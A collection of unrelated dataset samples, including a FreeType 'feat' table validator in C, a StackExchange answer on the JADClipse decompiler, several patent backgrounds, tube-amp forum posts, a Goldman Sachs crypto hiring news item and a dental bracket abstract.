B. G. Christensen, K. T. McCusker, J. B. Altepeter, B. Calkins, T. Gerrits, A. E. Lita, A. Miller, L. K. Shalm, Y. Zhang, S. W. Nam, N. Brunner, C. C. W. Lim, N. Gisin, and P. G. Kwiat, Phys. Rev. Lett. **111**, 130406 (2013).
S. V. Zhukovsky, L.G. Helt, D. Kang, P. Abolghasem, A. S. Helmy, and J. E. Sipe, Opt. Comm. **301-302**, 127 (2013).
In a separate experiment, we have demonstrated a concurrence of 0.98 via the type-II process in a similar waveguide with bandpass filtering only. The results will be published somewhere else.
H. Herrmann, X. Yang, A. Thomas, A. Poppe, W. Sohler, and C. Silberhorn, Opt. Express **21**, 27981 (2013).
Y. X. Gong, Z. D. Xie, P. Xu, X. Q. Yu, P. Xue, and S. N. Zhu, Phy. Rev. A **84**, 053825, (2011).
P. J. Mosley, A. Christ, A. Eckstein, C. Silberhorn, Phys. Rev. Lett. **103**, 233901, (2009).
|
{
"pile_set_name": "ArXiv"
}
|
On the map
ANCO CONSULTANTS LIMITED Directors
Credit Rating and compelling reasons
Current Credit Rating:
Previous Credit Rating:
County Court judgments (CCJs)
CCJ & Gazette
Description
ANCO CONSULTANTS LIMITED has been working since 3/29/2016. The current status of the business is Active ANCO CONSULTANTS LIMITED located on UNIT 3D DREADNOUGHT TRADING ESTATE, MAGDALEN LANE, BRIDPORT, DORSET, ENGLAND, DT6 5BUDirector Crowe Anne Marie is known as a Director of the company. Director Mcreavie Colin William is known as a Director of the company.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
JADClipse not working with Eclipse 3.6
Does Jadclipse work on Eclipse 3.6?
I have installed Jadclipse 3.3.0 on my Eclipse 3.6 by copying the jar into the plugins directory and restated eclipse.
Now I have the jadclipse menu under Windows->Preferences but when trying to de-compile any class it simply does not de-compile. I get the usual eclipse screen saying the source is unavailable. There are no errors in the Error Log.
Any idea?
A:
I eventually found the answer here.
Running eclipse with -clean switch and setting the file association between *.class and the jadclipse plug-in solved the problem.
A:
Set the JAD path correctly in Preferances>Java>Jad. Ex: D:\Jad\jad.exe
If still not working then,
Go to File extensions in Preferences. Select JadClipse as default editor for .class and .class with out source.
A:
The main reason is that you eclipse have default class viewer configured for class file which you have to change to your new class decompiler.
go to preference > editor > choose "class without source" and select your tool and mark as default. will work for you :)
|
{
"pile_set_name": "StackExchange"
}
|
The present invention relates to a tensioner adapted for adjusting tensile force of a chain or a toothed belt, and more particularly pertains to a tensioner hermetically containing oil, wherein the oil hermetic type tensioner provides a preventive structure which prevents a diaphragm covering an oil reservoir from extraordinarily deforming.
FIG. 5 shows a conventional oil hermetic type tensioner 50 as disclosed in Japanese Utility Model Application Laid-open No. Hei 1-121755. A piston 54 divides an inside of a cylinder 52 into a high-pressure chamber 56 and a low-pressure chamber 58. The total volume of the high-pressure chamber 56 and the low-pressure chamber 58 changes depending on the slidably reciprocal movement of the piston 54. The oil reservoir 62 can absorb any change of the total volume of the high-pressure chamber 56 and the low-pressure chamber 58.
The foregoing oil hermetic type tensioner 50 includes a diaphragm 60 and a pressurizing means 64 on the atmosphere side of diaphragm 60. The pressurizing means 64 is made up of a combination of a compression spring 65 and a spring seat 66, or of a sponge. When the piston 54 moves frontward (in a right direction as viewed in FIG. 5), oil from the oil reservoir 62 and the low-pressure chamber 58 flows through the passages 68, 70 and valve 72 into the high-pressure-chamber 56, reducing the air pressure in pressurizing means 64 and the oil volume in reservoir 62 and low-pressure chamber 58. The pressurizing means 64 prevents the low-pressure chamber 58 from becoming negative pressure and assures smooth flow of oil.
However, the diaphragm 60 is not restricted by the pressurizing means 64. Because the tensioner 50 is used where there are a lot of vibrations, either the diaphragm 60 or the pressurizing means 64 repeats free movement. Such free movement may cause an extraordinary deformation in diaphragm 60 which is normally biased by the pressurizing means 64.
Free movement between the diaphragm 60 and the pressurizing means 64 may cause the diaphragm 60 to be worn away. Further, extraordinary deformation may cause the diaphragm 60, itself, to apply a partial force. Consequently, durability of the diaphragm 60 would decline and, if worse comes to worst, oil could leak out of the diaphragm 60, so that the tensioner 50 cannot really properly perform its intended function.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
yeah, i spent a few hours sorting out the parts, short a couple, over a few. got amp 2 started. i have a plan. a module plan. prodution type assembly so all will be identical in the end. amps 3,4,5,6 and 7 will be next for the first set of parts. i will pobably leave the first one as is.
Yes sir! I didn't like the look of the double L layout... At first I wanted to place my serial number plate in between the tubes, but it was just a little too big... My father waited until the VERY last minute to change his chassis too, he liked my layout better than the original. The only MAJOR problem I had with mirroring the channel was that the feedback loop leads had to be reversed on side that was mirrored, I didn't make that mistake on Wayne's!
RIP BillD
BillD wrote:Well, some people are glass half empty people and some are glass half full. Being an engineer, I just think the glass is the wrong size.
I was talking to Bob about doing it like this, but he agreed that it would become too difficult to get all of the wiring in after the components are in... If you get further along on this, please PM me some photos, I would really enjoy looking at them!
RIP BillD
BillD wrote:Well, some people are glass half empty people and some are glass half full. Being an engineer, I just think the glass is the wrong size.
I got the first amp all wired up, it comes on, with an iPod plugged in with an RAC to Headphone jack it plays music!!! One problem.... When I take the RCA's off I get something that sounds like the THX surround sound track..... I have no idea what is causing this, YET... I am taking a break, maybe then I can figure it out.
Here is a photo of the final wiring:
RIP BillD
BillD wrote:Well, some people are glass half empty people and some are glass half full. Being an engineer, I just think the glass is the wrong size.
AlexSauter wrote:I got the first amp all wired up, it comes on, with an iPod plugged in with an RAC to Headphone jack it plays music!!! One problem.... When I take the RCA's off I get something that sounds like the THX surround sound track..... I have no idea what is causing this, YET... I am taking a break, maybe then I can figure it out.
AlexSauter wrote:I got the first amp all wired up, it comes on, with an iPod plugged in with an RAC to Headphone jack it plays music!!! One problem.... When I take the RCA's off I get something that sounds like the THX surround sound track..... I have no idea what is causing this, YET... I am taking a break, maybe then I can figure it out.
Here is a photo of the final wiring:
IMG_0718.JPG
Looks great Alex! You'll figure it out...faith!!!
It is about time The King moves into the world of surround sound.
All kidding aside, Alex, I have confidence you will figure this one out. The wiring looks exceptional, by the way.
To argue with a person who has renounced the use of reason is like administering medicine to the dead. — Thomas Paine
"Try not to become a man of success, but rather a man of value" Albert Einstein
"Politicians are the only people in the world who create problems and then campaign against them". Charlie Reese
"The problems we face today exist because the people who work for a living are outnumbered by those who vote for a living." Brad Shurett
"Kindness is a language that the Deaf can hear and the Blind can see." Mark Twain
|
{
"pile_set_name": "Pile-CC"
}
|
Non-volatile memory cells that are electrically programmable and erasable can be realized as charge-trapping memory cells, which comprise a memory layer sequence of dielectric materials, which is provided for charge-trapping in a memory layer that is arranged between confinement layers. The confinement layers have a larger energy band gap than the memory layer. The memory layer can be silicon nitride, while the confinement layers are usually silicon oxide. The memory layer sequence is arranged between a channel region that is located within a semiconductor body and a gate electrode that is arranged above the channel region and is provided to control the channel by means of an applied electric voltage. Charge carriers moving from source to drain through the channel region are accelerated and gain enough energy to be able to pass the lower confinement layer and to be trapped in the memory layer. The trapped charge carriers change the threshold voltage of the cell transistor structure.
A publication by B. Eitan et al., “NROM: a Novel Localized Trapping, 2-Bit Nonvolatile Memory Cell” in IEEE Electron Device Letters, volume 21, pages 543 to 545 (2000), describes a charge-trapping memory cell with a memory layer sequence of oxide, nitride and oxide, which is especially adapted to be operated with a reading voltage that is reverse to the programming voltage (reverse read). This publication is incorporated herein by reference. The oxide-nitride-oxide layer sequence is especially designed to avoid the direct tunneling regime and to guarantee the vertical retention of the trapped charge carriers. The oxide layers are specified to have a thickness of more than 5 nm. Two bits of information can be stored in every memory cell.
The ONO (oxide-nitride-oxide) sequence is grown or deposited onto a main surface of a semiconductor substrate in such a fashion that it extends over the complete area provided for the memory cell array before other method steps are performed. These further method steps include a deposition and structuring of wordline stacks comprising the gate electrodes and an implantation of the source and drain regions. The effective channel width of the charge-trapping memory cells is crucially affected by the final top width of the shallow trench isolations, which are provided to electrically insulate columns of memory cells within the array. Other important factors are the step height of the trench fillings and the thickness of the ONO layer. There is a plurality of other process steps that also affect the performance of the memory cells. These concern the exact dimensions of the insulating trenches and the thickness of the trench filling as well as several method steps by which auxiliary or sacrificial layers are removed or structured. Inevitable variations of the process parameters result in problems of a threshold voltage distribution that is too large and in degraded retention-after-cycling values (RAC). A further miniaturization of the memory devices will probably aggravate these problems.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
/***************************************************************************/
/* */
/* gxvfeat.c */
/* */
/* TrueTypeGX/AAT feat table validation (body). */
/* */
/* Copyright 2004-2018 by */
/* suzuki toshiya, Masatake YAMATO, Red Hat K.K., */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
/***************************************************************************/
/* */
/* gxvalid is derived from both gxlayout module and otvalid module. */
/* Development of gxlayout is supported by the Information-technology */
/* Promotion Agency(IPA), Japan. */
/* */
/***************************************************************************/
#include "gxvalid.h"
#include "gxvcommn.h"
#include "gxvfeat.h"
/*************************************************************************/
/* */
/* The macro FT_COMPONENT is used in trace mode. It is an implicit */
/* parameter of the FT_TRACE() and FT_ERROR() macros, used to print/log */
/* messages during execution. */
/* */
#undef FT_COMPONENT
#define FT_COMPONENT trace_gxvfeat
/*************************************************************************/
/*************************************************************************/
/***** *****/
/***** Data and Types *****/
/***** *****/
/*************************************************************************/
/*************************************************************************/
typedef struct GXV_feat_DataRec_
{
FT_UInt reserved_size;
FT_UShort feature;
FT_UShort setting;
} GXV_feat_DataRec, *GXV_feat_Data;
#define GXV_FEAT_DATA( field ) GXV_TABLE_DATA( feat, field )
typedef enum GXV_FeatureFlagsMask_
{
GXV_FEAT_MASK_EXCLUSIVE_SETTINGS = 0x8000U,
GXV_FEAT_MASK_DYNAMIC_DEFAULT = 0x4000,
GXV_FEAT_MASK_UNUSED = 0x3F00,
GXV_FEAT_MASK_DEFAULT_SETTING = 0x00FF
} GXV_FeatureFlagsMask;
/*************************************************************************/
/*************************************************************************/
/***** *****/
/***** UTILITY FUNCTIONS *****/
/***** *****/
/*************************************************************************/
/*************************************************************************/
static void
gxv_feat_registry_validate( FT_UShort feature,
FT_UShort nSettings,
FT_Bool exclusive,
GXV_Validator gxvalid )
{
GXV_NAME_ENTER( "feature in registry" );
GXV_TRACE(( " (feature = %u)\n", feature ));
if ( feature >= gxv_feat_registry_length )
{
GXV_TRACE(( "feature number %d is out of range %d\n",
feature, gxv_feat_registry_length ));
GXV_SET_ERR_IF_PARANOID( FT_INVALID_DATA );
goto Exit;
}
if ( gxv_feat_registry[feature].existence == 0 )
{
GXV_TRACE(( "feature number %d is in defined range but doesn't exist\n",
feature ));
GXV_SET_ERR_IF_PARANOID( FT_INVALID_DATA );
goto Exit;
}
if ( gxv_feat_registry[feature].apple_reserved )
{
/* Don't use here. Apple is reserved. */
GXV_TRACE(( "feature number %d is reserved by Apple\n", feature ));
if ( gxvalid->root->level >= FT_VALIDATE_TIGHT )
FT_INVALID_DATA;
}
if ( nSettings != gxv_feat_registry[feature].nSettings )
{
GXV_TRACE(( "feature %d: nSettings %d != defined nSettings %d\n",
feature, nSettings,
gxv_feat_registry[feature].nSettings ));
if ( gxvalid->root->level >= FT_VALIDATE_TIGHT )
FT_INVALID_DATA;
}
if ( exclusive != gxv_feat_registry[feature].exclusive )
{
GXV_TRACE(( "exclusive flag %d differs from predefined value\n",
exclusive ));
if ( gxvalid->root->level >= FT_VALIDATE_TIGHT )
FT_INVALID_DATA;
}
Exit:
GXV_EXIT;
}
static void
gxv_feat_name_index_validate( FT_Bytes table,
FT_Bytes limit,
GXV_Validator gxvalid )
{
FT_Bytes p = table;
FT_Short nameIndex;
GXV_NAME_ENTER( "nameIndex" );
GXV_LIMIT_CHECK( 2 );
nameIndex = FT_NEXT_SHORT ( p );
GXV_TRACE(( " (nameIndex = %d)\n", nameIndex ));
gxv_sfntName_validate( (FT_UShort)nameIndex,
255,
32768U,
gxvalid );
GXV_EXIT;
}
static void
gxv_feat_setting_validate( FT_Bytes table,
FT_Bytes limit,
FT_Bool exclusive,
GXV_Validator gxvalid )
{
FT_Bytes p = table;
FT_UShort setting;
GXV_NAME_ENTER( "setting" );
GXV_LIMIT_CHECK( 2 );
setting = FT_NEXT_USHORT( p );
/* If we have exclusive setting, the setting should be odd. */
if ( exclusive && ( setting & 1 ) == 0 )
FT_INVALID_DATA;
gxv_feat_name_index_validate( p, limit, gxvalid );
GXV_FEAT_DATA( setting ) = setting;
GXV_EXIT;
}
static void
gxv_feat_name_validate( FT_Bytes table,
FT_Bytes limit,
GXV_Validator gxvalid )
{
FT_Bytes p = table;
FT_UInt reserved_size = GXV_FEAT_DATA( reserved_size );
FT_UShort feature;
FT_UShort nSettings;
FT_ULong settingTable;
FT_UShort featureFlags;
FT_Bool exclusive;
FT_Int last_setting;
FT_UInt i;
GXV_NAME_ENTER( "name" );
/* feature + nSettings + settingTable + featureFlags */
GXV_LIMIT_CHECK( 2 + 2 + 4 + 2 );
feature = FT_NEXT_USHORT( p );
GXV_FEAT_DATA( feature ) = feature;
nSettings = FT_NEXT_USHORT( p );
settingTable = FT_NEXT_ULONG ( p );
featureFlags = FT_NEXT_USHORT( p );
if ( settingTable < reserved_size )
FT_INVALID_OFFSET;
if ( ( featureFlags & GXV_FEAT_MASK_UNUSED ) == 0 )
GXV_SET_ERR_IF_PARANOID( FT_INVALID_DATA );
exclusive = FT_BOOL( featureFlags & GXV_FEAT_MASK_EXCLUSIVE_SETTINGS );
if ( exclusive )
{
FT_Byte dynamic_default;
if ( featureFlags & GXV_FEAT_MASK_DYNAMIC_DEFAULT )
dynamic_default = (FT_Byte)( featureFlags &
GXV_FEAT_MASK_DEFAULT_SETTING );
else
dynamic_default = 0;
/* If exclusive, check whether default setting is in the range. */
if ( !( dynamic_default < nSettings ) )
FT_INVALID_FORMAT;
}
gxv_feat_registry_validate( feature, nSettings, exclusive, gxvalid );
gxv_feat_name_index_validate( p, limit, gxvalid );
p = gxvalid->root->base + settingTable;
for ( last_setting = -1, i = 0; i < nSettings; i++ )
{
gxv_feat_setting_validate( p, limit, exclusive, gxvalid );
if ( (FT_Int)GXV_FEAT_DATA( setting ) <= last_setting )
GXV_SET_ERR_IF_PARANOID( FT_INVALID_FORMAT );
last_setting = (FT_Int)GXV_FEAT_DATA( setting );
/* setting + nameIndex */
p += ( 2 + 2 );
}
GXV_EXIT;
}
/*************************************************************************/
/*************************************************************************/
/***** *****/
/***** feat TABLE *****/
/***** *****/
/*************************************************************************/
/*************************************************************************/
FT_LOCAL_DEF( void )
gxv_feat_validate( FT_Bytes table,
FT_Face face,
FT_Validator ftvalid )
{
GXV_ValidatorRec gxvalidrec;
GXV_Validator gxvalid = &gxvalidrec;
GXV_feat_DataRec featrec;
GXV_feat_Data feat = &featrec;
FT_Bytes p = table;
FT_Bytes limit = 0;
FT_UInt featureNameCount;
FT_UInt i;
FT_Int last_feature;
gxvalid->root = ftvalid;
gxvalid->table_data = feat;
gxvalid->face = face;
FT_TRACE3(( "validating `feat' table\n" ));
GXV_INIT;
feat->reserved_size = 0;
/* version + featureNameCount + none_0 + none_1 */
GXV_LIMIT_CHECK( 4 + 2 + 2 + 4 );
feat->reserved_size += 4 + 2 + 2 + 4;
if ( FT_NEXT_ULONG( p ) != 0x00010000UL ) /* Version */
FT_INVALID_FORMAT;
featureNameCount = FT_NEXT_USHORT( p );
GXV_TRACE(( " (featureNameCount = %d)\n", featureNameCount ));
if ( !( IS_PARANOID_VALIDATION ) )
p += 6; /* skip (none) and (none) */
else
{
if ( FT_NEXT_USHORT( p ) != 0 )
FT_INVALID_DATA;
if ( FT_NEXT_ULONG( p ) != 0 )
FT_INVALID_DATA;
}
feat->reserved_size += featureNameCount * ( 2 + 2 + 4 + 2 + 2 );
for ( last_feature = -1, i = 0; i < featureNameCount; i++ )
{
gxv_feat_name_validate( p, limit, gxvalid );
if ( (FT_Int)GXV_FEAT_DATA( feature ) <= last_feature )
GXV_SET_ERR_IF_PARANOID( FT_INVALID_FORMAT );
last_feature = GXV_FEAT_DATA( feature );
p += 2 + 2 + 4 + 2 + 2;
}
FT_TRACE4(( "\n" ));
}
/* END */
|
{
"pile_set_name": "Github"
}
|
Preface
This invention seeks to dramatically increase the utility of car informational displays and controls, while at the same time enhancing safety by improving sensory data presentation and ease of interaction with vehicle controls and data sources. The programmable nature of the disclosed devices also creates new methods for how data is delivered and utilized.
The disclosed invention, including co-pending applications incorporated by reference, contains unique embodiments which allow one to interact, by feel, with a display, called herein a “programmable tactile display”. It encompasses two main focus areas: A display having features commonly associated with a touch screen, but in a new form which can be sensed in several tactile manners, as well as visually. A tactile selection or adjustment means, such as a knob, slider, or switch, programmable in its tactile or visual nature, and generally operated in conjunction with the touch screen just described.
These features in turn provide the basis for a automobile instrument panel (dashboard) or other control panel which can be operated without undue concentration on visually reading the display while working the controls. It serves as an alternative, or adjunct, to voice activated systems being considered today to allow increased functionality with safety of vehicle operation. In several embodiments, the force or other sensation felt can itself be programmably changed, adding to driver understanding, and enhancing safety.
Because it resembles today's dashboards, and can be used for the basic control functions of the vehicle, the invention provides not only a potential means of telematic connectivity while driving (e.g. with the internet, cellular telephonic sources or the like), but a much more useful display and control system capable of many more functions—including the primary vehicle control functions, if desired.
In addition, I feel that a dashboard incorporating the invention can be built at lower cost than a conventional dashboard, especially as vehicles become ever more loaded up with navigational systems and other electronic functions incidental to the control of the vehicle.
There is no known prior art having the above characteristics.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
United Nations Security Council Resolution 2036
United Nations Security Council Resolution 2036 was unanimously adopted on 22 February 2012.
See also
List of United Nations Security Council Resolutions 2001 to 2100
References
External links
Text of the Resolution at undocs.org
Category:2012 United Nations Security Council resolutions
Category:United Nations Security Council resolutions concerning Somalia
Category:2012 in Somalia
Category:February 2012 events
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Altcoins Goldman Sachs Hires Crypto Trader ‘In Response to Client Interest’
Goldman Sachs has had its feelers in the cryptocurrency waters for a while. Now, the Wall Street giant looks set to take the plunge, having just hired a cryptocurrency trader to help the company expand into digital asset markets.
High Profile Hire
With Bitcoin looking rather bullish once more, Goldman Sachs is getting serious about cryptocurrency.
Goldman Sachs has hired former trader Justin Schmidt to head the multinational investment bank’s and financial services company’s digital asset markets in Goldman’s securities division, as reported by Tearsheet.
Schmidt, who assumed the position on April 16, previously served as both a senior VP at Seven Eight Capital and portfolio manager at LMR Partners.
Institutional Investment Inbound
The new addition to Goldman Sach’s team represents the dramatic increase in institutional interest towards Bitcoin over recent months.
Reports first surfaced regarding the Wall Street giant’s plans to launch a cryptocurrency trading desk in December, though the financial institution has repeatedly denied the claims.
Goldman Sach’s did, however, help fund peer-to-peer payments technology company Circle in 2015. As reported by Bitcoinist yesterday, the Goldman-funded company recently doubled the size of its minimum cryptocurrency trade requirements from $250,000 to $500,000 — citing the fact that “the market is robust.”
Indeed, the cryptocurrency market’s purported robustness has increased interest from high-net-worth clients at high-profile investment banks. Said Goldman Sach’s spokeswoman Tiffany Galvin-Cohen:
In response to client interest in various digital products, we are exploring how best to serve them in the space. At this point, we have not reached a conclusion on the scope of our digital asset offering.
Singing a different song
Of course, Goldman hasn’t always been particularly bullish on Bitcoin and cryptocurrencies in general.
The financial behemoth’s head of global investment research Steve Strongin pronounced the eventual death of all but “a handful” of cryptocurrencies in February — stating that “most, if not all, will never see their recent peaks again.”
Later, in March, Goldman Sachs analysts panicked forecasted a bearish return to recent lows below $6000 for Bitcoin. That prediction did not pan out, and such a return is looking less and less likely with each day — as evidenced by the company’s increased interest.
What do you think about Goldman Sach’s latest hire? How high do you think institutional investment will push the value of Bitcoin and other cryptocurrencies in the future? Let us know in the comments below!
Images courtesy of AP, Bitcoinist archives, Shutterstock
|
{
"pile_set_name": "OpenWebText2"
}
|
35 Eversley TerraceYeronga, Qld 4104
Contact agent
residential land, Sold on 18 Dec 2017
Affordable land in premium location
Opportunities for land in the sought-after pocket of Yeronga are few and far between, however this is your opportunity to get in quick and secure this fantastic East facing 405m2 block with 10.05m frontage and City glimpse potential. This site is ready and waiting for your dream home.
- Easy stroll to local cafes and shops- Parks and off-leash dog area within walking distance- Walk to bus and train- Sought after river precinct suburb- Only 7kms to the Brisbane City with strong capital growth- Bike paths and River walks close by- Easy access to the M3 to travel to Brisbane, Gold Coast or Ipswich- House and land packages available on request- Approved plans available upon request- Close to the Green Bridge, UQ and Hospitals- Agent onsite on request...Read more
|
{
"pile_set_name": "Pile-CC"
}
|
Colour stability of aesthetic brackets: ceramic and plastic.
The colour stability of aesthetic brackets may differ according to their composition, morphology and surface property, which may consequently influence their aesthetic performance. To assess the colour stability of aesthetic brackets (ceramic and plastic) after simulating aging and staining. Twelve commercially manufactured ceramic brackets and four different plastic brackets were assessed. To determine possible colour change (change of E*(ab)) and the value of the NBS (National Bureau of Standards) unit system, spectrophotometric colour measurements for CIE L*, a* and b* were taken before and after the brackets were aged and stained. Statistical analysis was undertaken using a one-way ANOVA analysis of variance and a Tukey multiple comparison test (alpha = 0.05). The colour change between the various (ceramic and plastic) materials was not significant (p > 0.05), but still varied significantly (p < 0.001) between the brackets of the same composition or crystalline structure and among commercial brands. Colour stability cannot be confirmed simply by knowing the type of material and crystalline composition or structure.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.